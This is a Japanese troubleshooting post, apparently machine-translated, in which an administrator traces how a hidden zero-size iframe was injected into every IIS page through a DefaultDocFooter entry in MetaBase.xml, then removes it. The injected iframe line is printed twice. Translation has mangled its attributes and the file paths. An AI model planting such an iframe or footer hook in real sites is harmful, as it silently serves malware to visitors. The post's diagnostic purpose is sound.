サーバーがほぼすべての Web サイトを開くと、HTML ページも表示されます。
<iframe src=" http://xxxdfsfd/web.htm " 高さ=0 幅=0></iframe>
このスタイルのコードの一部は先頭部分にあり、一部はウイルス対策ソフトウェアが開くとウイルスを報告します。
HTML または ASP の PHP ページを開いたときに、ソース コード内にこのコードが見つかりません。
理由を分析する
まず、ARP マルウェアを疑い、ARP 対策ツールを使用しましたが、ARP スプーフィングは見つかりませんでした。
さらに、arp スプーフィングは通常、毎回コードに挿入されるわけではありませんが、場合によっては挿入されることもあります。
また、http ://127.0.0.1またはhttp://localhost を使用してアクセスするときにこのコードを見つけることもできます。
ARP スプーフィングの可能性が排除されます。
そこで、JS が改ざんされているか、他のインクルード ファイルが改ざんされているのではないかと考えました。検索したところ、新しく作成された HTML ページを参照しても、このコードが挿入されるため、IIS 経由でのみハングアップできます。 。
iis データをバックアップしてから iis を再インストールした後、バックアップした iis を復元するとコードが消えました。
慎重に検索した結果、問題は IIS 構成ファイルにあるはずです。構成ファイルを開いたところ、そのコードが見つかりませんでした。
特定のファイルが呼び出されている可能性が高いのですが、どうすれば確認できますか? 突然、有名なファイルモンを思い出しました。
ローカルにダウンロードしてサーバーにアップロードしました。データが多すぎたので、不要なものを除外しました。
iis プロセスだけが残っており、サーバー上にはまだ多くの人々がサイトにアクセスしているようです。
すべてのサイトを閉じて、ディレクトリ D:www にテスト サイト anky を構築し、以下に空のページ test.htm を作成します。
このページにアクセスして、コードが挿入されているので、Filemon を見てください。C:Inetpubwwwrootiisstart.htm の読み方が不思議です。
C:Inetpubwwwrootiisstart.htm を開き、次のファイルがあることを確認します。
<iframe src=" http://xxxdfsfd/web.htm " 高さ=0 幅=0></iframe>
test.htm にアクセスする場合は、コードを削除して空白のままにし、C:Inetpubwwwrootiisstart.htm を削除して再度アクセスします。
ここでtest.htmに「データフッターファイルの読み込みエラー」という問題が出てくるそうです。
このファイル。
C:Inetpubwwwrootiisstart.htm をクリアすれば正常になります。問題を解決するには、当然、プラグを抜く必要があります。
続く
拡張機能が原因である可能性はありますか? 拡張機能で確認したところ、すべて正常でした。
もちろん、ISAPI を介したトロイの木馬も存在します。
いろいろ考えた結果、最終的に設定ファイルに問題があると感じました。
%windir%system32inetsrvMetaBase.xml にある構成ファイルを開きます。
メモ帳で開き、iisstart.htm を検索して、最初はデフォルトのサイトだと思ったのですが、違うと思いました。
デフォルトのサイトは削除されています。次のコードを詳しく見てください。
DefaultDocFooter="ファイル:C:Inetpubwwwrootiisstart.htm"
この行を削除すると、問題は完全に解決されます。